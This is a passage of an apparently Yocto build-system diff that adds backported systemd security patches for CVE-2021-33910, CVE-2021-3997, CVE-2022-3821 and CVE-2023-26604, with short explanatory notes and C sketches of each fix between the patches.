+The path may have unbounded length, for example through a fuse mount.
+
+CVE-2021-33910: attacker-controlled alloca() leads to a crash in systemd and
+ultimately a kernel panic. Systemd parses the content of /proc/self/mountinfo
+and each mountpoint is passed to mount_setup_unit(), which calls
+unit_name_path_escape() underneath. A local attacker who is able to mount a
+filesystem with a very long path can crash systemd and the whole system.
+
+https://bugzilla.redhat.com/show_bug.cgi?id=1970887
+
+The resulting string length is bounded by UNIT_NAME_MAX, which is 256. But we
+can't easily check the length after simplification before doing the
+simplification, which in turn uses a copy of the string we can write to.
+So we can't reject paths that are too long before doing the duplication.
+Hence the most obvious solution is to switch back to strdup(), as before
+7410616cd9dbbec97cf98d75324da5cda2b2f7a2.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9]
+CVE: CVE-2021-33910
+
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/unit-name.c | 13 +++++--------
+ 1 file changed, 5 insertions(+), 8 deletions(-)
+
+--- a/src/basic/unit-name.c
++++ b/src/basic/unit-name.c
+@@ -369,12 +369,13 @@ int unit_name_unescape(const char *f, char **ret) {
+ }
+
+ int unit_name_path_escape(const char *f, char **ret) {
+- char *p, *s;
++ _cleanup_free_ char *p = NULL;
++ char *s;
+
+ assert(f);
+ assert(ret);
+
+- p = strdupa(f);
++ p = strdup(f);
+ if (!p)
+ return -ENOMEM;
+
+@@ -386,13 +387,9 @@ int unit_name_path_escape(const char *f, char **ret) {
+ if (!path_is_normalized(p))
+ return -EINVAL;
+
+- /* Truncate trailing slashes */
++ /* Truncate trailing slashes and skip leading slashes */
+ delete_trailing_chars(p, "/");
+-
+- /* Truncate leading slashes */
+- p = skip_leading_chars(p, "/");
+-
+- s = unit_name_escape(p);
++ s = unit_name_escape(skip_leading_chars(p, "/"));
+ }
+ if (!s)
+ return -ENOMEM;
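
The commit message above is the whole rationale: strdupa() allocates on the stack via alloca(), so an input of attacker-chosen length dictates stack growth, while strdup() simply fails with ENOMEM. Below is a minimal standalone sketch of that trade-off in plain C; path_copy_trimmed() is an invented helper that only mirrors the shape of unit_name_path_escape() and is not code from the systemd tree.

/* Minimal standalone sketch (plain C, not systemd code): heap duplication
 * instead of strdupa()/alloca() for strings of unbounded length. An overlong
 * input makes strdup() fail with ENOMEM instead of growing the stack. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Invented helper that only mirrors the shape of unit_name_path_escape():
 * duplicate on the heap, trim trailing slashes, skip leading ones. */
static int path_copy_trimmed(const char *path, char **ret) {
        char *p, *start, *end;

        p = strdup(path);               /* heap allocation, fails gracefully */
        if (!p)
                return -ENOMEM;

        end = p + strlen(p);
        while (end > p && end[-1] == '/')
                *--end = '\0';          /* truncate trailing slashes */

        start = p;
        while (*start == '/')
                start++;                /* skip leading slashes */

        *ret = strdup(start);
        free(p);
        return *ret ? 0 : -ENOMEM;
}

int main(void) {
        char *out = NULL;

        if (path_copy_trimmed("///proc//self/mountinfo///", &out) == 0) {
                printf("%s\n", out);    /* prints: proc//self/mountinfo */
                free(out);
        }
        return 0;
}
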
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
new file mode 100644
index 0000000000..341976822b
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
@@ -0,0 +1,65 @@
+Backport of the following upstream commit:
+From fbb77e1e55866633c9f064e2b3bcf2b6402d962d Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 23 Nov 2021 15:55:45 +0100
+Subject: [PATCH 1/3] shared/rm_rf: refactor rm_rf_children_inner() to shorten
+ code a bit
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 27 +++++++++------------------
+ 1 file changed, 9 insertions(+), 18 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -34,7 +34,7 @@
+ const struct stat *root_dev) {
+
+ struct stat st;
+- int r;
++ int r, q = 0;
+
+ assert(fd >= 0);
+ assert(fname);
+@@ -50,7 +50,6 @@
+
+ if (is_dir) {
+ _cleanup_close_ int subdir_fd = -1;
+- int q;
+
+ /* if root_dev is set, remove subdirectories only if device is same */
+ if (root_dev && st.st_dev != root_dev->st_dev)
+@@ -86,23 +85,15 @@
+ * again for each directory */
+ q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
+
+- r = unlinkat(fd, fname, AT_REMOVEDIR);
+- if (r < 0)
+- return r;
+- if (q < 0)
+- return q;
+-
+- return 1;
+-
+- } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
+- r = unlinkat(fd, fname, 0);
+- if (r < 0)
+- return r;
+-
+- return 1;
+- }
++ } else if (flags & REMOVE_ONLY_DIRECTORIES)
++ return 0;
+
+- return 0;
++ r = unlinkat(fd, fname, is_dir ? AT_REMOVEDIR : 0);
++ if (r < 0)
++ return r;
++ if (q < 0)
++ return q;
++ return 1;
+ }
+
+ int rm_rf_children(
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
new file mode 100644
index 0000000000..066e10fbbc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
@@ -0,0 +1,101 @@
+Backport of the following upstream commit:
+From bd0127daaaae009ade053718f7d2f297aee4acaf Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 23 Nov 2021 16:56:42 +0100
+Subject: [PATCH 2/3] shared/rm_rf: refactor rm_rf() to shorten code a bit
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 53 ++++++++++++++++++++--------------------------
+ 1 file changed, 23 insertions(+), 30 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -159,7 +159,7 @@
+ }
+
+ int rm_rf(const char *path, RemoveFlags flags) {
+- int fd, r;
++ int fd, r, q = 0;
+
+ assert(path);
+
+@@ -191,49 +191,47 @@
+ }
+
+ fd = open(path, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+- if (fd < 0) {
++ if (fd >= 0) {
++ /* We have a dir */
++ r = rm_rf_children(fd, flags, NULL);
++
++ if (FLAGS_SET(flags, REMOVE_ROOT)) {
++ q = rmdir(path);
++ if (q < 0)
++ q = -errno;
++ }
++ } else {
+ if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
+ return 0;
+
+ if (!IN_SET(errno, ENOTDIR, ELOOP))
+ return -errno;
+
+- if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES))
++ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES) || !FLAGS_SET(flags, REMOVE_ROOT))
+ return 0;
+
+- if (FLAGS_SET(flags, REMOVE_ROOT)) {
+-
+- if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
+- struct statfs s;
+-
+- if (statfs(path, &s) < 0)
+- return -errno;
+- if (is_physical_fs(&s))
+- return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+- "Attempted to remove files from a disk file system under \"%s\", refusing.",
+- path);
+- }
+-
+- if (unlink(path) < 0) {
+- if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
+- return 0;
++ if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
++ struct statfs s;
+
++ if (statfs(path, &s) < 0)
+ return -errno;
+- }
++ if (is_physical_fs(&s))
++ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++ "Attempted to remove files from a disk file system under \"%s\", refusing.",
++ path);
+ }
+
+- return 0;
++ r = 0;
++ q = unlink(path);
++ if (q < 0)
++ q = -errno;
+ }
+
+- r = rm_rf_children(fd, flags, NULL);
+-
+- if (FLAGS_SET(flags, REMOVE_ROOT) &&
+- rmdir(path) < 0 &&
+- r >= 0 &&
+- (!FLAGS_SET(flags, REMOVE_MISSING_OK) || errno != ENOENT))
+- r = -errno;
+-
+- return r;
++ if (r < 0)
++ return r;
++ if (q < 0 && (q != -ENOENT || !FLAGS_SET(flags, REMOVE_MISSING_OK)))
++ return q;
++ return 0;
+ }
+
+ int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
new file mode 100644
index 0000000000..c96b8d9a6e
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
@@ -0,0 +1,266 @@
+Backport of the following upstream commit:
+From bef8e8e577368697b2e6f85183b1dbc99e0e520f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 30 Nov 2021 22:29:05 +0100
+Subject: [PATCH 3/3] shared/rm-rf: loop over nested directories instead of
+ recursing
+
+To remove directory structures, we need to remove the innermost items first,
+and then recursively remove higher-level directories. We would recursively
+descend into directories and invoke rm_rf_children and rm_rf_children_inner.
+This is problematic when too many directories are nested.
+
+Instead, let's create a "TODO" queue. In the queue, for each level we
+hold the DIR* object we were working on, and the name of the directory. This
+allows us to leave a partially-processed directory, and restart the removal
+loop one level down. When done with the inner directory, we use the name to
+unlinkat() it from the parent, and proceed with the removal of other items.
+
+Because the nesting is increased by one level, it is best to view this patch
+with -b/--ignore-space-change.
+
+This fixes CVE-2021-3997, https://bugzilla.redhat.com/show_bug.cgi?id=2024639.
+The issue was reported and patches reviewed by Qualys Team.
+Mauro Matteo Cascella and Riccardo Schirone from Red Hat handled the disclosure.
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 161 +++++++++++++++++++++++++++++++--------------
+ 1 file changed, 113 insertions(+), 48 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -26,12 +26,13 @@
+ return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
+ }
+
+-static int rm_rf_children_inner(
++static int rm_rf_inner_child(
+ int fd,
+ const char *fname,
+ int is_dir,
+ RemoveFlags flags,
+- const struct stat *root_dev) {
++ const struct stat *root_dev,
++ bool allow_recursion) {
+
+ struct stat st;
+ int r, q = 0;
+@@ -49,9 +50,7 @@
+ }
+
+ if (is_dir) {
+- _cleanup_close_ int subdir_fd = -1;
+-
+- /* if root_dev is set, remove subdirectories only if device is same */
++ /* If root_dev is set, remove subdirectories only if device is same */
+ if (root_dev && st.st_dev != root_dev->st_dev)
+ return 0;
+
+@@ -63,7 +62,6 @@
+ return 0;
+
+ if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
+-
+ /* This could be a subvolume, try to remove it */
+
+ r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
+@@ -77,13 +75,16 @@
+ return 1;
+ }
+
+- subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++ if (!allow_recursion)
++ return -EISDIR;
++
++ int subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+ if (subdir_fd < 0)
+ return -errno;
+
+ /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
+ * again for each directory */
+- q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
++ q = rm_rf_children(subdir_fd, flags | REMOVE_PHYSICAL, root_dev);
+
+ } else if (flags & REMOVE_ONLY_DIRECTORIES)
+ return 0;
+@@ -96,64 +97,128 @@
+ return 1;
+ }
+
++typedef struct TodoEntry {
++ DIR *dir; /* A directory that we were operating on. */
++ char *dirname; /* The filename of that directory itself. */
++} TodoEntry;
++
++static void free_todo_entries(TodoEntry **todos) {
++ for (TodoEntry *x = *todos; x && x->dir; x++) {
++ closedir(x->dir);
++ free(x->dirname);
++ }
++
++ freep(todos);
++}
++
+ int rm_rf_children(
+ int fd,
+ RemoveFlags flags,
+ const struct stat *root_dev) {
+
+- _cleanup_closedir_ DIR *d = NULL;
+- struct dirent *de;
++ _cleanup_(free_todo_entries) TodoEntry *todos = NULL;
++ size_t n_todo = 0, allocated = 0;
++ _cleanup_free_ char *dirname = NULL; /* Set when we are recursing and want to delete ourselves */
+ int ret = 0, r;
+
+- assert(fd >= 0);
++ /* Return the first error we run into, but nevertheless try to go on.
++ * The passed fd is closed in all cases, including on failure. */
+
+- /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
+- * fd, in all cases, including on failure. */
++ for (;;) { /* This loop corresponds to the directory nesting level. */
++ _cleanup_closedir_ DIR *d = NULL;
++ struct dirent *de;
++
++ if (n_todo > 0) {
++ /* We know that we are in recursion here, because n_todo is set.
++ * We need to remove the inner directory we were operating on. */
++ assert(dirname);
++ r = unlinkat(dirfd(todos[n_todo-1].dir), dirname, AT_REMOVEDIR);
++ if (r < 0 && r != -ENOENT && ret == 0)
++ ret = r;
++ dirname = mfree(dirname);
++
++ /* And now let's back out one level up */
++ n_todo --;
++ d = TAKE_PTR(todos[n_todo].dir);
++ dirname = TAKE_PTR(todos[n_todo].dirname);
++
++ assert(d);
++ fd = dirfd(d); /* Retrieve the file descriptor from the DIR object */
++ assert(fd >= 0);
++ } else {
++ next_fd:
++ assert(fd >= 0);
++ d = fdopendir(fd);
++ if (!d) {
++ safe_close(fd);
++ return -errno;
++ }
++ fd = dirfd(d); /* We donated the fd to fdopendir(). Let's make sure we sure we have
++ * the right descriptor even if it were to internally invalidate the
++ * one we passed. */
++
++ if (!(flags & REMOVE_PHYSICAL)) {
++ struct statfs sfs;
++
++ if (fstatfs(fd, &sfs) < 0)
++ return -errno;
++
++ if (is_physical_fs(&sfs)) {
++ /* We refuse to clean physical file systems with this call, unless
++ * explicitly requested. This is extra paranoia just to be sure we
++ * never ever remove non-state data. */
++
++ _cleanup_free_ char *path = NULL;
++
++ (void) fd_get_path(fd, &path);
++ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++ "Attempted to remove disk file system under \"%s\", and we can't allow that.",
++ strna(path));
++ }
++ }
++ }
+
+- d = fdopendir(fd);
+- if (!d) {
+- safe_close(fd);
+- return -errno;
+- }
++ FOREACH_DIRENT_ALL(de, d, return -errno) {
++ int is_dir;
+
+- if (!(flags & REMOVE_PHYSICAL)) {
+- struct statfs sfs;
++ if (dot_or_dot_dot(de->d_name))
++ continue;
+
+- if (fstatfs(dirfd(d), &sfs) < 0)
+- return -errno;
+- }
++ is_dir = de->d_type == DT_UNKNOWN ? -1 : de->d_type == DT_DIR;
+
+- if (is_physical_fs(&sfs)) {
+- /* We refuse to clean physical file systems with this call, unless explicitly
+- * requested. This is extra paranoia just to be sure we never ever remove non-state
+- * data. */
+-
+- _cleanup_free_ char *path = NULL;
+-
+- (void) fd_get_path(fd, &path);
+- return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+- "Attempted to remove disk file system under \"%s\", and we can't allow that.",
+- strna(path));
+- }
+- }
++ r = rm_rf_inner_child(fd, de->d_name, is_dir, flags, root_dev, false);
++ if (r == -EISDIR) {
++ /* Push the current working state onto the todo list */
+
+- FOREACH_DIRENT_ALL(de, d, return -errno) {
+- int is_dir;
++ if (!GREEDY_REALLOC0(todos, allocated, n_todo + 2))
++ return log_oom();
+
+- if (dot_or_dot_dot(de->d_name))
+- continue;
++ _cleanup_free_ char *newdirname = strdup(de->d_name);
++ if (!newdirname)
++ return log_oom();
+
+- is_dir =
+- de->d_type == DT_UNKNOWN ? -1 :
+- de->d_type == DT_DIR;
+-
+- r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
+- if (r < 0 && r != -ENOENT && ret == 0)
+- ret = r;
+- }
++ int newfd = openat(fd, de->d_name,
++ O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++ if (newfd >= 0) {
++ todos[n_todo++] = (TodoEntry) { TAKE_PTR(d), TAKE_PTR(dirname) };
++ fd = newfd;
++ dirname = TAKE_PTR(newdirname);
++
++ goto next_fd;
+
+- if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
+- ret = -errno;
++ } else if (errno != -ENOENT && ret == 0)
++ ret = -errno;
++
++ } else if (r < 0 && r != -ENOENT && ret == 0)
++ ret = r;
++ }
++
++ if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(fd) < 0 && ret >= 0)
++ ret = -errno;
++
++ if (n_todo == 0)
++ break;
++ }
+
+ return ret;
+ }
+@@ -250,5 +315,5 @@
+ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
+ return -EINVAL;
+
+- return rm_rf_children_inner(fd, name, -1, flags, NULL);
++ return rm_rf_inner_child(fd, name, -1, flags, NULL, true);
+ }
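
The refactoring described in the commit message replaces per-directory recursion with an explicit, heap-allocated work list, so the nesting depth of the input no longer dictates call-stack usage. As a rough illustration of that pattern (generic C on a toy tree structure, not the rm_rf() code itself; Node and free_tree() are invented for the example):

/* Standalone sketch of the explicit "TODO" stack pattern on a toy tree
 * (invented Node/free_tree, not the rm_rf() code): pending work lives on the
 * heap, so input nesting depth no longer dictates call-stack usage. */
#include <stdio.h>
#include <stdlib.h>

typedef struct Node {
        struct Node *child;             /* first child */
        struct Node *sibling;           /* next sibling */
} Node;

static void free_tree(Node *root) {
        Node **stack = NULL;
        size_t n = 0, alloc = 0;

        if (root) {
                stack = malloc(sizeof(Node *));
                if (!stack)
                        abort();
                alloc = 1;
                stack[n++] = root;
        }

        while (n > 0) {
                Node *cur = stack[--n];
                Node *todo[2] = { cur->child, cur->sibling };

                /* Defer the children instead of recursing into them. */
                for (int i = 0; i < 2; i++) {
                        if (!todo[i])
                                continue;
                        if (n == alloc) {
                                alloc *= 2;
                                stack = realloc(stack, alloc * sizeof(Node *));
                                if (!stack)
                                        abort();
                        }
                        stack[n++] = todo[i];
                }

                free(cur);
        }

        free(stack);
}

int main(void) {
        /* A degenerate, deeply nested chain that would overflow the stack
         * if freed with naive recursion. */
        Node *root = NULL;

        for (int i = 0; i < 1000000; i++) {
                Node *node = calloc(1, sizeof(Node));
                if (!node)
                        abort();
                node->child = root;
                root = node;
        }

        free_tree(root);
        puts("freed without recursion");
        return 0;
}
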
diff --git a/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
new file mode 100644
index 0000000000..f9c6704cfc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
@@ -0,0 +1,47 @@
+From 9102c625a673a3246d7e73d8737f3494446bad4e Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 7 Jul 2022 18:27:02 +0900
+Subject: [PATCH] time-util: fix buffer-over-run
+
+Fixes #23928.
+
+CVE: CVE-2022-3821
+Upstream-Status: Backport [https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: Both the hunks refreshed to backport
+
+---
+ src/basic/time-util.c | 2 +-
+ src/test/test-time-util.c | 5 +++++
+ 2 files changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/src/basic/time-util.c b/src/basic/time-util.c
+index abbc4ad5cd70..26d59de12348 100644
+--- a/src/basic/time-util.c
++++ b/src/basic/time-util.c
+@@ -514,7 +514,7 @@ char *format_timespan(char *buf, size_t
+ t = b;
+ }
+
+- n = MIN((size_t) k, l);
++ n = MIN((size_t) k, l-1);
+
+ l -= n;
+ p += n;
+diff --git a/src/test/test-time-util.c b/src/test/test-time-util.c
+index e8e4e2a67bb1..58c5fa9be40c 100644
+--- a/src/test/test-time-util.c
++++ b/src/test/test-time-util.c
+@@ -501,6 +501,12 @@ int main(int argc, char *argv[]) {
+ test_format_timespan(1);
+ test_format_timespan(USEC_PER_MSEC);
+ test_format_timespan(USEC_PER_SEC);
++
++ /* See issue #23928. */
++ _cleanup_free_ char *buf;
++ assert_se(buf = new(char, 5));
++ assert_se(buf == format_timespan(buf, 5, 100005, 1000));
++
+ test_timezone_is_valid();
+ test_get_timezones();
+ test_usec_add();
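
The one-character change in this patch hinges on how snprintf() reports truncation: it returns the length the output would have had, which can exceed the remaining buffer, so the write cursor may only advance by at most size - 1. A standalone sketch of that rule follows (append() is invented for the example and far simpler than format_timespan()):

/* Standalone sketch of the off-by-one fixed above: snprintf() returns the
 * length the output would have had, so on truncation the cursor may advance
 * by at most size - 1, never by the full size. */
#include <stdio.h>
#include <string.h>

#define MIN(a, b) ((a) < (b) ? (a) : (b))

static void append(char **p, size_t *l, const char *word) {
        int k = snprintf(*p, *l, "%s ", word);
        if (k < 0)
                return;

        /* With MIN((size_t) k, *l) a truncated write would move the cursor
         * past the terminating NUL, so any later write through it would land
         * outside the buffer. */
        size_t n = MIN((size_t) k, *l - 1);
        *p += n;
        *l -= n;
}

int main(void) {
        char buf[8];
        char *p = buf;
        size_t l = sizeof(buf);

        append(&p, &l, "1y");
        append(&p, &l, "2month");       /* truncated, but stays in bounds */
        append(&p, &l, "3d");

        printf("\"%s\" (len %zu)\n", buf, strlen(buf));
        return 0;
}
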
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
new file mode 100644
index 0000000000..39f9480cf8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
@@ -0,0 +1,115 @@
+From 612ebf6c913dd0e4197c44909cb3157f5c51a2f0 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Mon, 31 Aug 2020 19:37:13 +0200
+Subject: [PATCH] pager: set $LESSSECURE whenever we invoke a pager
+
+Some extra safety when invoked via "sudo". In principle this is a
+genuine design flaw of sudo, and we shouldn't need to deal with this.
+But it's still a good idea to disable this surface given how exotic it
+is.
+
+Prompted by #5666
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/612ebf6c913dd0e4197c44909cb3157f5c51a2f0]
+Comments: Hunk not refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ man/less-variables.xml | 9 +++++++++
+ man/systemctl.xml | 1 +
+ man/systemd.xml | 1 +
+ src/shared/pager.c | 23 +++++++++++++++++++++--
+ 4 files changed, 32 insertions(+), 2 deletions(-)
+
+diff --git a/man/less-variables.xml b/man/less-variables.xml
+index 08e513c99f8e..c52511ca8e18 100644
+--- a/man/less-variables.xml
++++ b/man/less-variables.xml
+@@ -64,6 +64,15 @@
+ the invoking terminal is determined to be UTF-8 compatible).</para></listitem>
+ </varlistentry>
+
++ <varlistentry id='lesssecure'>
++ <term><varname>$SYSTEMD_LESSSECURE</varname></term>
++
++ <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
++ variable when invoking the pager, which controls the "secure" mode of less (which disables commands
++ such as <literal>|</literal> which allow to easily shell out to external command lines). By default
++ less secure mode is enabled, with this setting it may be disabled.</para></listitem>
++ </varlistentry>
++
+ <varlistentry id='colors'>
+ <term><varname>$SYSTEMD_COLORS</varname></term>
+
+diff --git a/man/systemctl.xml b/man/systemctl.xml
+index 1c5502883700..a3f0c3041a57 100644
+--- a/man/systemctl.xml
++++ b/man/systemctl.xml
+@@ -2240,6 +2240,7 @@ Jan 12 10:46:45 example.com bluetoothd[8900]: gatt-time-server: Input/output err
+ <xi:include href="less-variables.xml" xpointer="pager"/>
+ <xi:include href="less-variables.xml" xpointer="less"/>
+ <xi:include href="less-variables.xml" xpointer="lesscharset"/>
++ <xi:include href="less-variables.xml" xpointer="lesssecure"/>
+ <xi:include href="less-variables.xml" xpointer="colors"/>
+ <xi:include href="less-variables.xml" xpointer="urlify"/>
+ </refsect1>
+diff --git a/man/systemd.xml b/man/systemd.xml
+index a9040545c2ab..c92cfef77689 100644
+--- a/man/systemd.xml
++++ b/man/systemd.xml
+@@ -692,6 +692,7 @@
+ <xi:include href="less-variables.xml" xpointer="pager"/>
+ <xi:include href="less-variables.xml" xpointer="less"/>
+ <xi:include href="less-variables.xml" xpointer="lesscharset"/>
++ <xi:include href="less-variables.xml" xpointer="lesssecure"/>
+ <xi:include href="less-variables.xml" xpointer="colors"/>
+ <xi:include href="less-variables.xml" xpointer="urlify"/>
+
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index e03be6d23b2d..9c21881241f5 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -9,6 +9,7 @@
+ #include <unistd.h>
+
+ #include "copy.h"
++#include "env-util.h"
+ #include "fd-util.h"
+ #include "fileio.h"
+ #include "io-util.h"
+@@ -152,8 +153,7 @@ int pager_open(PagerFlags flags) {
+ _exit(EXIT_FAILURE);
+ }
+
+- /* Initialize a good charset for less. This is
+- * particularly important if we output UTF-8
++ /* Initialize a good charset for less. This is particularly important if we output UTF-8
+ * characters. */
+ less_charset = getenv("SYSTEMD_LESSCHARSET");
+ if (!less_charset && is_locale_utf8())
+@@ -164,6 +164,25 @@ int pager_open(PagerFlags flags) {
+ _exit(EXIT_FAILURE);
+ }
+
++ /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
++ * privileged stuff. */
++ r = getenv_bool("SYSTEMD_LESSSECURE");
++ if (r == 0) { /* Remove env var if off */
++ if (unsetenv("LESSSECURE") < 0) {
++ log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
++ _exit(EXIT_FAILURE);
++ }
++ } else {
++ /* Set env var otherwise */
++ if (r < 0)
++ log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
++
++ if (setenv("LESSSECURE", "1", 1) < 0) {
++ log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
++ _exit(EXIT_FAILURE);
++ }
++ }
++
+ if (pager_args) {
+ r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
+ if (r < 0) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch
new file mode 100644
index 0000000000..95da7cfad6
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch
@@ -0,0 +1,264 @@
+From 1b5b507cd2d1d7a2b053151abb548475ad9c5c3b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Mon, 12 Oct 2020 18:57:32 +0200
+Subject: [PATCH] test-login: always test sd_pid_get_owner_uid(), modernize
+
+A long time ago, some functions only worked when in a session, and the test
+didn't execute them when sd_pid_get_session() failed. Let's always call
+them to increase coverage.
+
+While at it, let's test for ==0 not >=0 where we don't expect the function
+to return anything except 0 or error.
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/1b5b507cd2d1d7a2b053151abb548475ad9c5c3b.patch]
+Comments: Hunk not refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ src/libsystemd/sd-login/test-login.c | 131 ++++++++++++++-------------
+ 1 file changed, 70 insertions(+), 61 deletions(-)
+
+diff --git a/src/libsystemd/sd-login/test-login.c b/src/libsystemd/sd-login/test-login.c
+index c0c77e04714b..0494fc77ba18 100644
+--- a/src/libsystemd/sd-login/test-login.c
++++ b/src/libsystemd/sd-login/test-login.c
+@@ -5,21 +5,22 @@
+ #include "sd-login.h"
+
+ #include "alloc-util.h"
++#include "errno-list.h"
+ #include "fd-util.h"
+ #include "format-util.h"
+ #include "log.h"
+ #include "string-util.h"
+ #include "strv.h"
+ #include "time-util.h"
+-#include "util.h"
++#include "user-util.h"
+
+ static char* format_uids(char **buf, uid_t* uids, int count) {
+- int pos = 0, k, inc;
++ int pos = 0, inc;
+ size_t size = (DECIMAL_STR_MAX(uid_t) + 1) * count + 1;
+
+ assert_se(*buf = malloc(size));
+
+- for (k = 0; k < count; k++) {
++ for (int k = 0; k < count; k++) {
+ sprintf(*buf + pos, "%s"UID_FMT"%n", k > 0 ? " " : "", uids[k], &inc);
+ pos += inc;
+ }
+@@ -30,6 +31,10 @@ static char* format_uids(char **buf, uid_t* uids, int count) {
+ return *buf;
+ }
+
++static const char *e(int r) {
++ return r == 0 ? "OK" : errno_to_name(r);
++}
++
+ static void test_login(void) {
+ _cleanup_close_pair_ int pair[2] = { -1, -1 };
